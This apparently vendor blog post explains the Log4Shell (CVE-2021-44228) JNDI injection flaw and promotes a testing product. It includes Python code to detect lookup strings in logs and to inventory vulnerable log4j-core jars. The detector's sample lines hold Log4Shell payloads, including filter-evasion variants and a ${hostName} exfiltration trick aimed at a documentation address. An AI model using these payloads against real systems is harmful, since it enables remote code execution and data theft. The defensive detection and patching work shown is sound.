On November 24, 2021, the Apache Software Foundation was notified by the Alibaba Cloud Security team of a remote code execution (RCE) vulnerability in Log4j, now tracked as CVE-2021-44228. Because the Apache Log4j library is embedded in a very large number of Java applications, the potential impact is wide-scale, and the flaw is being actively exploited in the wild.
Log4j is a widely used logging library found in a large share of Java applications, including the business systems that record operational and audit logs. The vulnerability is trivial to exploit: an attacker only needs to get a specially crafted string into a field that the application logs (a username, a User-Agent header, a search query), and Log4j will reach out to an attacker-controlled server, load the code it returns, and execute it in the victim environment.
Understanding the vulnerability.
Logged messages are normally treated purely as data. Log4j 2, however, supports “lookups”: ${...} expressions inside a log message that the library resolves at logging time, among them Java Naming and Directory Interface (JNDI) lookups. These lookups were not restricted to trusted sources, which is the root of the vulnerability. JNDI is the Java API for naming and directory services; it lets an application query LDAP, DNS, RMI and similar services for data and objects. When an attacker gets a string of the form ${jndi:ldap://<attacker host>/x} written to a log, Log4j resolves the lookup, connects to the attacker's LDAP server, and can be directed to fetch and load an untrusted Java class from it. Once that class is loaded, the victim server runs the attacker's code. No sophistication is required on the attacker's side; the payload is a single line of text, and variants that build the string out of nested lookups are used to slip past simple filters.
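As an added example (not code from the original post, from Ridge Security, or from the Log4j project), the following Python detector scans web server access logs for Log4Shell lookup strings. A plain search for the literal text "${jndi:" misses payloads assembled from nested lookups, so the detector first resolves the evasion idioms the way Log4j's Interpolator does (${lower:...}, ${upper:...} and the ${key:-default} fallback), then matches the resulting JNDI lookup and reports its scheme. The log lines are constructed for the example and 203.0.113.10 is a documentation address.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in untrusted text.

Added example, not code from Ridge Security or the Log4j project.
Matching the literal "${jndi:" misses payloads that build the string from
nested lookups, so innermost lookups are resolved first, following the
rules Log4j applies, and the normalised text is matched afterwards.
"""
import re

# Schemes seen in real payloads: ldap, ldaps, rmi, dns, iiop, corba, nis, nds.
# Any scheme is reported, since every JNDI lookup on a vulnerable version is bad.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)", re.IGNORECASE)

# A lookup whose body contains no further "${" or "}": the innermost one.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve_inner(body):
    """Resolve one innermost lookup body the way Log4j's Interpolator would.

    Only the evasion idioms matter here:
      ${lower:X}       -> x
      ${upper:X}       -> X
      ${key:-default}  -> default   (e.g. ${::-j} -> j, ${env:NOPE:-n} -> n)
    Everything else, including ${jndi:...} itself, is kept verbatim so that
    the detection regex can still see it.
    """
    if body.lower().startswith("jndi:"):
        return "${" + body + "}"
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return "${" + body + "}"


def normalize(text, max_passes=20):
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(max_passes):
        resolved = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_lookups(text):
    """Return the lowercase JNDI schemes found in text after normalisation."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(text))]


def scan_log(lines):
    """Return (line index, schemes, normalised line) for each suspicious line."""
    hits = []
    for index, line in enumerate(lines):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append((index, schemes, normalize(line)))
    return hits


# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${${lower:j}ndi:${lower:r}mi://203.0.113.10:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10/z}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOPE:-j}ndi:dns://203.0.113.10/${hostName}}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:21 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for index, schemes, shown in scan_log(SAMPLE_LINES):
        print("line %d: jndi via %s -> %s" % (index, ",".join(schemes), shown))
```

The last sample line shows why the normaliser keeps unknown lookups instead of stripping them: ${date:yyyy} is a legitimate Log4j lookup and must not raise an alert, while the ${hostName} left inside the fourth payload is a common exfiltration trick and is preserved in the reported line.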
How RidgeBot can help.
To help organizations find and close this hole before attackers use it to breach the network, Ridge Security added detection and safe exploitation of the Apache Log4j vulnerability to RidgeBot starting with version 3.8.
Using RidgeBot, you can safely test whether your web server is vulnerable and whether your environment actually allows the flaw to be exploited. Even if you have already patched, we recommend testing that the patch took effect in your environment: Log4j is usually bundled inside applications, containers and vendor products rather than installed as a standalone package, so a single fix rarely covers every copy. With this validation in place, you stay one step ahead of the attackers.
These snapshots show what RidgeBot 3.8 vulnerability testing delivers to security admins:
Figure 1. Apache Log4j-2 RCE Vulnerability Found
Figure 2. Proof of a Successful Exploit – Compromised Web Shell
Figure 3. Attack Path Visualization
What you can do.
- First and foremost, understand the vulnerability and the risk it poses to your environment: inventory where Log4j 2 is in use, including inside third-party applications and appliances.
- Apply the patch: upgrade every affected copy of Log4j 2 to a fixed release. This is the strongest action security teams can take to remove the remote code execution risk.
- Where an upgrade is not immediately possible, review the Log4j version shipped with each Java application (Log4j is a Java library, not a component of the Apache HTTP Server) and apply the documented mitigation: disable message lookups with the log4j2.formatMsgNoLookups=true setting (available from Log4j 2.10), or remove the JndiLookup class from the log4j-core jar.
- Contact Ridge Security for a validation test.
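As an added example covering the inventory and mitigation steps above (not code from the original post, from Ridge Security, or from the Apache Log4j project), this Python script walks a directory tree, opens every log4j-core jar it finds, reads the version from the jar manifest, and checks whether the JndiLookup class is still present, since deleting that class is the documented mitigation for versions that cannot be upgraded right away. The version ranges in the triage logic follow the Apache Log4j security advisory for CVE-2021-44228. The sample jars it builds for the demo are constructed stand-ins with empty placeholder entries, not real bytecode.

```python
"""Inventory log4j-core jars and triage them for CVE-2021-44228.

Added example; not code from Ridge Security or the Apache Log4j project.
For every log4j-core*.jar under a directory it reads the version from the
manifest (falling back to the Maven-style file name) and checks whether
org/apache/logging/log4j/core/lookup/JndiLookup.class is still inside.
Jars nested in .war/.ear archives and shaded fat jars are not unpacked here.
"""
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparseable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not m:
        return None
    return tuple(int(part or 0) for part in m.groups())


def triage(version, jndi_class_present):
    """Verdict for one log4j-core jar against CVE-2021-44228.

    Per the Apache Log4j advisory: 2.0-beta9 through 2.14.1 are affected,
    2.15.0 is the first release with the fix, and log4j2.formatMsgNoLookups
    only exists from 2.10.0 on. Pre-beta9 2.0 builds are treated as
    vulnerable to stay conservative.
    """
    if version is None:
        return "UNKNOWN: version not found, inspect manually"
    if version[0] < 2:
        return "NOT AFFECTED by CVE-2021-44228 (Log4j 1.x is end-of-life, plan an upgrade anyway)"
    if version >= (2, 15, 0):
        return "FIXED for CVE-2021-44228 (still move to the latest release)"
    if not jndi_class_present:
        return "MITIGATED: affected version but JndiLookup.class has been removed"
    if version >= (2, 10, 0):
        return "VULNERABLE: upgrade, or set log4j2.formatMsgNoLookups=true / remove JndiLookup.class"
    return "VULNERABLE: upgrade or remove JndiLookup.class (formatMsgNoLookups needs 2.10+)"


def inspect_jar(path):
    """Return (version string or None, JndiLookup.class present?) for a jar."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
            if m:
                version = m.group(1)
        if version is None:  # fall back to e.g. log4j-core-2.14.1.jar
            m = re.search(r"log4j-core-(\d[\w.-]*)\.jar$", os.path.basename(path))
            if m:
                version = m.group(1)
        return version, JNDI_CLASS in names


def scan_tree(root):
    """Triage every log4j-core*.jar under root: (path, version, present, verdict)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                version, present = inspect_jar(path)
                findings.append((path, version, present, triage(parse_version(version), present)))
    return sorted(findings)


# Constructed sample jars: (relative path, manifest version, keep JndiLookup.class?)
SAMPLE_JARS = [
    ("app1/lib/log4j-core-2.14.1.jar", "2.14.1", True),   # unpatched
    ("app2/lib/log4j-core-2.14.1.jar", "2.14.1", False),  # class removed by an admin
    ("app3/lib/log4j-core-2.8.2.jar", "2.8.2", True),     # too old for formatMsgNoLookups
    ("app4/lib/log4j-core-2.17.1.jar", "2.17.1", True),   # upgraded
]


def build_sample_jars(root):
    """Write the constructed sample jars below root (placeholder entries only)."""
    for rel, version, keep_jndi in SAMPLE_JARS:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF",
                         "Manifest-Version: 1.0\nImplementation-Version: %s\n" % version)
            if keep_jndi:
                jar.writestr(JNDI_CLASS, b"")  # stand-in for the real class file


def demo():
    """Scan the constructed jars in a temp dir; return {app dir: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_jars(root)
        return {os.path.relpath(p, root).split(os.sep)[0]: verdict
                for p, _v, _present, verdict in scan_tree(root)}


if __name__ == "__main__":
    for app, verdict in sorted(demo().items()):
        print(app, "->", verdict)
```

Run it against a real host with scan_tree("/opt") or the application root instead of demo(); the JndiLookup check is what lets you confirm that an emergency "remove the class" mitigation was actually applied to the jar in production, rather than trusting a ticket that says it was.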